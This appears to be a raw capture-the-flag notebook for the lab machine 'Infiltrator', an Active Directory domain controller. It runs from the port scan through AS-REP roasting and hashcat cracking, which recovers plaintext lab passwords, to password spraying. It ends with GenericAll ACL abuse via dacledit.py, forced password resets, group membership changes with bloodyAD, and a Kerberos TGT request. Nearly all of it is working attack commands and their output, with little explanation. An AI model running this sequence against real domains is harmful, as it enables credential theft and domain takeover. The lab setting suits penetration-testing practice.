53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
9389/tcp open adws
15220/tcp open unknown
15230/tcp open unknown
49666/tcp open unknown
49689/tcp open unknown
49691/tcp open unknown
49694/tcp open unknown
49723/tcp open unknown
49747/tcp open unknown
49866/tcp open unknown
Users based on the names of format x.x on the website
nxc ldap infiltrator.htb -u potential_users.txt -p '' --asreproast asreproasting.txt
[email protected]:6bd465884c14ad665eb80e077cb243d6$b4f1e39d63484c5688040d5c28fff01528 e37d85665bb13890a32625d51c7a983bdceae029abaaf2fc7d6936954b88a70b762d8e842639d04196ff46649dc070bb23d1f4e7a8d65015f63035051145064efd546adb48b6b9a3ee95fdb205213 6179bf9a50102dbe79163fb1ca4b712eff70a47e55bfaed27035d2b2ed935b917dc5619a1b5364744a8ca3eb0825fe65ac395a065cd5d39ec5ec4d89e2807456f75fcf0018760613defbe348146c5 72d9ed0ad5303159a2576b6f573ae231e713e5fdd1d119ce6cc15217761489e11e663088bf5cf1dd4f8a17e7ec6802ba00d4cb9d818f334ee719fdb3211095ca1b3925d8
hashcat -a 0 asreproasting.txt /usr/share/wordlists/rockyou.txt
infiltrator.htb\\l.clark:WAT?watismypass!
[Oct 27, 2024 - 20:30:09 (PDT)] exegol-default creds # nxc ldap 10.10.11.31 -u l.clark -p 'WAT?watismypass!' --users
SMB 10.10.11.31 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.31 389 DC01 [+] infiltrator.htb\\l.clark:WAT?watismypass!
LDAP 10.10.11.31 389 DC01 [*] Total of records returned 15
LDAP 10.10.11.31 389 DC01 Administrator Built-in account for administering the computer/domain
LDAP 10.10.11.31 389 DC01 Guest Built-in account for guest access to the computer/domain
LDAP 10.10.11.31 389 DC01 krbtgt Key Distribution Center Service Account
LDAP 10.10.11.31 389 DC01 D.anderson
LDAP 10.10.11.31 389 DC01 L.clark
LDAP 10.10.11.31 389 DC01 M.harris
LDAP 10.10.11.31 389 DC01 O.martinez
LDAP 10.10.11.31 389 DC01 A.walker
LDAP 10.10.11.31 389 DC01 K.turner MessengerApp@Pass!
LDAP 10.10.11.31 389 DC01 E.rodriguez
LDAP 10.10.11.31 389 DC01 winrm_svc
LDAP 10.10.11.31 389 DC01 lan_managment
d.anderson is protected user (bloodhound)
[Oct 27, 2024 - 20:58:17 (PDT)] exegol-default creds # nxc smb 10.10.11.31 -u users.txt -p 'WAT?watismypass!' --users -k --continue-on-success
SMB 10.10.11.31 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\\Administrator:WAT?watismypass! KDC_ERR_PREAUTH_FAILED
SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\\Guest:WAT?watismypass! KDC_ERR_CLIENT_REVOKED
SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\\krbtgt:WAT?watismypass! KDC_ERR_CLIENT_REVOKED
SMB 10.10.11.31 445 DC01 [+] infiltrator.htb\\D.anderson:WAT?watismypass!
SMB 10.10.11.31 445 DC01 [+] infiltrator.htb\\L.clark:WAT?watismypass!
SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\\M.harris:WAT?watismypass! KDC_ERR_PREAUTH_FAILED
SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\\O.martinez:WAT?watismypass! KDC_ERR_PREAUTH_FAILED
SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\\A.walker:WAT?watismypass! KDC_ERR_PREAUTH_FAILED
SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\\K.turner:WAT?watismypass! KDC_ERR_PREAUTH_FAILED
SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\\E.rodriguez:WAT?watismypass! KDC_ERR_PREAUTH_FAILED
SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\\winrm_svc:WAT?watismypass! KDC_ERR_PREAUTH_FAILED
SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\\lan_managment:WAT?watismypass! KDC_ERR_PREAUTH_FAILED
d.anderson has genericall on marketing digital OU, which contains e.rodriguez
add genricall + reset password
dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb'/'d.anderson':'WAT?watismypass!' -k -dc-ip 10.10.11.31
changepasswd.py -newpass 'BruhWhat123' 'infiltrator.htb'/'e.rodriguez':'aa'@'dc01.infiltrator.htb' -reset -altuser d.anderson -altpass 'WAT?watismypass!' -p kpasswd
e.rodriguez → addself to CHIEFS [email protected] → force change password [email protected]
bloodyAD -u e.rodriguez -p BruhWhat123 -d infiltrator.htb --host 10.10.11.31 -v DEBUG add groupMember 'Chiefs Marketing' 'e.rodriguez'
changepasswd.py -newpass 'BruhWhat123' 'infiltrator.htb'/'m.harris':'BruhWhat123'@'dc01.infiltrator.htb' -reset -altuser e.rodriguez -altpass 'BruhWhat123' -p kpasswd
getTGT.py infiltrator.htb/m.harris:BruhWhat123